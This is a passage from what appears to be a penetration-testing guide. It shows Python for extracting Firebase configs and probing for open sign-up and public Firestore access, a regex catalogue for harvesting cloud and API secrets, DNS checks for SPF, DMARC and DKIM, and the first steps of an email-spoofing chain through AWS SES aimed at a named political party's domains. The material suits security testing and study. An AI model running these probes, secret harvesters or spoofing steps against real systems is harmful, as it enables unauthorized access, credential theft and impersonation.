&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="223-firebase-project-discovery" &gt;
&lt;div&gt;
&lt;a href="#223-firebase-project-discovery"&gt;
##
&lt;/a&gt;
22.3 Firebase Project Discovery
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract Firebase configs from JS bundles and test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search for Firebase configs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:firebase\.initializeApp|firebaseConfig)\s*\(\s*(\{[^}]+\})&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# or apiKey: &amp;#34;AIza...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# For each config found, test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;test_firebase&lt;/span&gt;(api_key, project_id):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test signUp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;api_key&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;test@test.com&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;Test123!&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;returnSecureToken&amp;#34;&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 SignUp OPEN in &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test Firestore&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;api_key&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 Firestore PUBLIC in &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="224-auto-extract-secrets-from-multiple-sources" &gt;
&lt;div&gt;
&lt;a href="#224-auto-extract-secrets-from-multiple-sources"&gt;
##
&lt;/a&gt;
22.4 Auto-Extract Secrets from Multiple Sources
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;glob&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;os&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;SECRET_PATTERNS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# AWS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Access Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AKIA|ASIA)[A-Z0-9]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{16}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Secret Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:&amp;#34;|^)(?:secretAccessKey|aws_secret_access_key)[=:]\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]?([A-Za-z0-9/+=]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{40}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GCP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GCP SA Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(&amp;#34;type&amp;#34;:\s*&amp;#34;service_account&amp;#34;.*?&amp;#34;private_key&amp;#34;)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GCP API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;AIza[0-9A-Za-z\-_]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{35}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Firebase&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Firebase Config&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;apiKey:\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]AIza[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{30,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Supabase&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseUrl|SUPABASE_URL):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](https://[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.supabase\.co)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase Anon Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseKey|SUPABASE_ANON_KEY):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# JWT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT Token&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{10,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# API keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SendGrid&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;SG\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Stripe Live&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:sk_live|pk_live)_[A-Za-z0-9]{24,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OpenAI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;sk-[A-Za-z0-9]{32,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GitHub Token&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9_]{36,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Databases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MongoDB URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;mongodb(?:\+srv)?://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;PostgreSQL URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;postgres(?:ql)?://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MySQL URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;mysql://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Redis URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;redis://[^@\s]*@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;scan_for_secrets&lt;/span&gt;(text, source_name):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Scans text for secrets using regex patterns.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; found &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; SECRET_PATTERNS&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; matches &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(pattern, text, re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;IGNORECASE)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; matches:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;isinstance&lt;/span&gt;(m, &lt;span style="color:#99d1db"&gt;tuple&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; m[&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(m) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;6&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; found&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;append((name, m[:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;]))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; found:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\n&lt;/span&gt;&lt;span style="color:#a6d189"&gt;📄 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;source_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, secret &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; found:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; 🔑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;secret&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; found
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="23-email-security--dmarc-spf-dkim" &gt;
&lt;div&gt;
&lt;a href="#23-email-security--dmarc-spf-dkim"&gt;
#
&lt;/a&gt;
23. EMAIL SECURITY — DMARC, SPF, DKIM
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="231-quick-check" &gt;
&lt;div&gt;
&lt;a href="#231-quick-check"&gt;
##
&lt;/a&gt;
23.1 Quick Check
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SPF&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | grep &lt;span style="color:#a6d189"&gt;&amp;#34;v=spf1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DMARC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT _dmarc.&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DKIM (common selector: google)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT google._domainkey.&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MX&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short MX &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="232-interpreting-results" &gt;
&lt;div&gt;
&lt;a href="#232-interpreting-results"&gt;
##
&lt;/a&gt;
23.2 Interpreting Results
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Config&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 ~all&lt;/code&gt; (softfail)&lt;/td&gt;
&lt;td&gt;Unlisted hosts get SoftFail: receivers accept the message and at most tag it&lt;/td&gt;
&lt;td&gt;Spoofed mail is delivered unless DMARC enforces&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 ?all&lt;/code&gt; (neutral)&lt;/td&gt;
&lt;td&gt;Neutral for every host, equivalent to publishing no SPF&lt;/td&gt;
&lt;td&gt;Totally permissive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 include:amazonses.com ~all&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Every Amazon SES egress IP passes SPF for the domain, not just the domain&amp;rsquo;s own SES account&lt;/td&gt;
&lt;td&gt;SPF no longer identifies the domain&amp;rsquo;s senders; SES identity verification is the only control left&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=none&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Monitor only: receivers send reports but take no action on failures&lt;/td&gt;
&lt;td&gt;No enforcement; SPF and DKIM results are advisory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=quarantine&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Failing mail goes to spam (for the &lt;code&gt;pct=&lt;/code&gt; share, default 100)&lt;/td&gt;
&lt;td&gt;Partial protection: forged mail still reaches the mailbox, flagged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=reject&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Failing mail is rejected at SMTP time&lt;/td&gt;
&lt;td&gt;Full protection for the apex; check &lt;code&gt;sp=&lt;/code&gt; for subdomains and &lt;code&gt;pct=&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DKIM missing&lt;/td&gt;
&lt;td&gt;No key at the selectors tested (DKIM is per selector: read the &lt;code&gt;s=&lt;/code&gt; tag of a real message before concluding)&lt;/td&gt;
&lt;td&gt;No signature over the content; DMARC can only pass through aligned SPF, which forwarding breaks&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Political party — DMARC &lt;code&gt;p=none&lt;/code&gt; on both domains (&lt;code&gt;party.org.br&lt;/code&gt;, &lt;code&gt;party.com&lt;/code&gt;). SPF &lt;code&gt;~all&lt;/code&gt; with &lt;code&gt;include:amazonses.com&lt;/code&gt; (every SES egress IP authorised, not only the party&amp;rsquo;s own SES account). Nothing in the chain enforces, so mail with a forged &lt;code&gt;From:&lt;/code&gt; is delivered: total email spoofing.&lt;/p&gt;
&lt;h3 id="233-email-spoofing-via-aws-ses" &gt;
&lt;div&gt;
&lt;a href="#233-email-spoofing-via-aws-ses"&gt;
##
&lt;/a&gt;
23.3 Email Spoofing via AWS SES
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;With &lt;code&gt;v=spf1 include:amazonses.com ~all&lt;/code&gt; and &lt;code&gt;v=DMARC1; p=none&lt;/code&gt; the chain runs as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create an AWS account and verify your own domain in SES&lt;/li&gt;
&lt;li&gt;Every SES egress IP now passes the target&amp;rsquo;s SPF: the record authorises the whole platform, not the party&amp;rsquo;s own tenant. Caveat: SES only relays a &lt;code&gt;From:&lt;/code&gt; or MAIL FROM identity that is verified in the sending account, so &lt;code&gt;From: president@party.org.br&lt;/code&gt; from a stranger&amp;rsquo;s account is refused (&amp;ldquo;Email address is not verified&amp;rdquo;); that verification is the only control the broad &lt;code&gt;include&lt;/code&gt; leaves standing&lt;/li&gt;
